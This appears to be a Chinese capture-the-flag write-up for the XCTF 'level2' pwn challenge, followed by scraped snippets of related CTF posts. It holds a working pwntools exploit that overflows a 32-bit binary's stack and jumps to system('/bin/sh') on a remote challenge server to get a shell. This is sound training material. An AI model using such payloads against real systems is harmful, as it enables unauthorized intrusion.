[攻防世界 pwn]——level2
技術標籤:# 攻防世界
[攻防世界 pwn]——level2
- 題目地址: https://adworld.xctf.org.cn/
- 題目:
32位程式
IDA中, 找到system和 ‘/bin/sh’ 地址進行覆蓋
exploit
from pwn import *
p = remote("111.200.241.244",55083)
system_addr = 0x0804845C
binsh = 0x0804A024
payload = 'a' * (0x88 + 0x4) + p32(system_addr) + p32(binsh)
p.sendline(payload)
p.interactive( )
相關推薦
[攻防世界 pwn]——level2
技術標籤:# 攻防世界 [攻防世界 pwn]——level2 題目地址: https://adworld.xctf.org.cn/題目:32位程式IDA中, 找到system和 ‘/bin/sh’ 地址進行覆蓋
攻防世界PWN簡單題 level2
攻防世界PWN簡單題 level2 此題考驗的是對ROP鏈攻擊的基礎 萬事開頭PWN第一步checksec 一下
攻防世界-pwn-writeup
when_did_you_born題目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5051&page=1
攻防世界-pwn-int_overflow
此題是一道整數溢位型別的題,我們首先來看一下整數溢位的原理╰(°▽°)╯
攻防世界-pwn-forgot
技術標籤:CTF 簡單題…不過一開始沒找到重點,浪費時間了。開始定義了一大堆沒有用的函式。然後是開始一大堆輸出。給了函式地址,不過因為沒有PIE所以其實不需要… 漏洞點在scanf,明顯的溢位,但是這裡不是這麼
[攻防世界 pwn]——get_shell
技術標籤:# 攻防世界 [攻防世界 pwn]——get_shell 題目地址: https://adworld.xctf.org.cn/題目:
【pwn】攻防世界 pwn新手區wp
【pwn】攻防世界 pwn新手區wp 前言 這幾天惡補pwn的各種知識點,然後看了看攻防世界的pwn新手區沒有堆題(堆才剛剛開始看),所以就花了一晚上的時間把新手區的10題給寫完了。
攻防世界PWN簡單題 level0
攻防世界PWN簡單題 level0 開始考驗棧溢位的相關知識了 Checksec 一下檔案 看看都開了什麼保護 和 是多少位的程式
攻防世界pwn題:forgot
0x00:檢視檔案資訊 該檔案是32位的,canary和PIE保護機制沒開。 0x01:用IDA進行靜態分析
【攻防世界】:新手區 | when_did_you_born
checksec檢視程式型別: 有Canary,先看看程式邏輯 [*] \'/home/zowie/Downloads/when_did_you_born\'
【攻防世界】:新手區 | guess number
checksec程式資訊: Arch:amd64-64-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:PIE enabled
『攻防世界』:新手區 | int_overflow
checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:No canary found NX:NX enabled PIE:No PIE (0x8048000)
『攻防世界』:新手區 | strings
checksec: Arch:amd64-64-little RELRO:Full RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x400000) IDA:
『攻防世界』:新手區 | CGfsb
checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)
攻防世界 cr4-poor-rsa
題目 給了一個壓縮包,內有檔案:flag.b64(打開發現是base64編碼的)和key.pub 解題過程
『攻防世界』:進階區 | stack2
checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)
攻防世界web進階(一)
1.PHP_python_template_injection 1.題目提示python模板注入,測試http://220.249.52.133:47149/{{7+7}},發現回顯“URL http://220.249.52.133:47149/14 not found”,說明括號裡的程式碼被執行了,存在SSTI。
攻防世界app2 frida獲取金鑰
環境準備 安裝mumu模擬器 pip安裝frida,這裡到最後一步setup需要很長時間。 在frida github下載對應服務端。
『攻防世界』:進階區 | Mary_Morton
這道題讓我重新學了一遍格式化字串漏洞,自學真的太頂了。 checksec:開啟了canary
攻防世界-crypto-easychallenge(.pyc反編譯)
進入題目後下載附件,發現是一個.pyc檔案。 pyc是一種二進位制檔案,是由py檔案經過編譯後,生成的檔案,是一種byte code,py檔案變成pyc檔案後,執行載入的速度會有所提高;另一反面,把py檔案編譯為pyc檔案,從而可